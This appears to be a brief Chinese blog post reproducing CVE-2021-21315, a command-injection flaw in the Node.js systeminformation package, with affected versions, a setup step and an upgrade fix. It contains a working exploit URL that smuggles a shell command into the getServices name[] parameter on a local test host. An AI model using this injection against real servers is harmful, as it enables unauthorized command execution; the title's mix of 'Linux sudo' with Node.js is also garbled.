CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现漏洞简介 Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。 2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞CVE-2021-21315,攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。
影响版本
Systeminformation < 5.3.1
 
漏洞复现下载poc nodejs开启http node index.js http://192.168.1.192:23854/api/getServices?name[]=$(echo%20-e%20%E2%80%98NULL%E2%80%99%20%3E%201.txt)  
# 修复: 升级到安全版本
| 
发表于 2021-10-19 19:27:18